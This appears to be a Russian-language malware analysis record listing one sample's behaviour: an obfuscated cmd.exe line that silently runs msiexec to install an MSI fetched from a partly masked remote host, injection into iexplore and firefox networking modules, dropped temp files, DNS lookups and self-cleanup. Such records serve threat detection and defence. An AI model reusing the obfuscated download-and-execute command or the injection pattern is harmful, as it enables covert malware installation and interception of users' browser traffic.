Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/tgh66091.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
- %TEMP%\dav0dobcjoyhvigaa
- %TEMP%\fngvgxbvl16l9
- %TEMP%\nsbc0fe.tmp\juw9gxx34fgqj.dll
- %WINDIR%\installer\msic007.tmp
- 'fa###finn.com':80
- 'do###oadhs.com':80
- DNS ASK fa###finn.com
- DNS ASK st#####ipautjority.com
- DNS ASK do###oadhs.com
- DNS ASK hu####anekickgg.com
- '%WINDIR%\installer\msic007.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/tgh66091.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/tgh66091.msi /qn
- '%WINDIR%\syswow64\msiexec.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSIC007.tmp"